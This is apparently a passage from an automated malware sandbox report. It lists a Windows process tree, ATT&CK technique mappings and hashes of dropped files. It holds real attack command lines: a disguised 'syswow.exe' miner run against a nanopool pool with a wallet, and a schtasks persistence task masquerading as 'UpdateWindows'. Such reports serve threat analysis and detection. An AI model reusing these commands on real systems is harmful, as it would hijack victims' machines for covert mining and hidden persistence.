                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1364
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4464
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:196
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4448
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4996
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5688
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3368
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6068
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2840
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3676
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4808
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1416
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\246D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\246D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5004
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\299E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\299E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4896
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5568
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3140.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3140.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4152
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 736
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 748
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6056
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 752
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5344
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 884
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4080
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 876
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6092
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3643.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3643.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5064
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4552
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4800
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5320
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5388
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2180
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4904
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5356
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6008
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:188

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Windows Defender\AHHAXDEDNF\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Windows Defender\AHHAXDEDNF\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      0d0e81f0756c606f91750b490e71ae7b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ef11c566a508757912305e8da612c6d2acfc1670

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cb6c9784bb3f77d9fbe4ec75cac232fd33562bced9e7fe26e93a36a3a8941bfc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4ae3a0af86dd84def89647e2fac6e95e387b48e588ca0884f5fceba365927dc4905912ae7a179b24c55c5d78e93e0ac7a389d501c96e681aa356df2d22d199fc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2f7384ffa5dd679b751258b72a64ab2b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      14734d52f733ad07f8719b87b7898e0d23e97e9e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8c1489171b426ed9c8c5f7c244c657bc71547834ac5c272a17ed6f7c939f6ef5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      22c86b190e52eff275117588ede6337c3f4cb37054ca71139534aab3daa3afe767f786c9064963e4804df5593d830266888ad0d658be60d69c9837ac6ac5b9d5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5

